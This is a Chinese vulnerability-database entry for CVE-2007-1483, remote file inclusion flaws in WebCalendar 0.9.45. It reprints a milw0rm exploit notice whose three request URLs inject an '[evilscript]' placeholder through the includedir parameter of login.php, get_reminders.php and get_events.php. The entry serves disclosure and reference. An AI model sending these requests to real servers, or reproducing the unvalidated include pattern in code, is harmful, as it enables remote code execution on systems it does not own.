WebCalendar 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112450 漏洞类型 代码注入
发布时间 2007-03-15 更新时间 2009-02-12
CVE编号 CVE-2007-1483 CNNVD-ID CNNVD-200703-398
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3492
https://cxsecurity.com/issue/WLB-2007030123
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-398
|漏洞详情
WebCalendar0.9.45版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)login.php,(2)get_reminders.php或(3)get_events.php的includedir参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Authord : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64, |
| exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX; |
| |
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------

# milw0rm.com [2007-03-15]
|参考资料

来源:BID
名称:23054
链接:http://www.securityfocus.com/bid/23054
来源:XF
名称:webcalendar-multiple-file-include(33008)
链接:http://xforce.iss.net/xforce/xfdb/33008
来源:BUGTRAQ
名称:20070315WebCalendarv0.9.45(13Dec2004)(login.php)RemoteFileinclude
链接:http://www.securityfocus.com/archive/1/archive/1/462957/100/0/threaded
来源:BUGTRAQ
名称:20070320Re:WebCalendarv0.9.45(13Dec2004)(login.php)RemoteFileinclude
链接:http://www.securityfocus.com/archive/1/463288
来源:MILW0RM
名称:3492
链接:http://www.milw0rm.com/exploits/3492
来源:MLIST
名称:[webcalendar-announce]20070304Announce:Release1.0.5(securitypatch)
链接:http://sourceforge.net/mailarchive/forum.php?thread_name=45EAF486.9080902%40k5n.us&forum_name=webcalendar-announce
来源:SREASON
名称:2425
链接:http://securityreason.com/securityalert/2425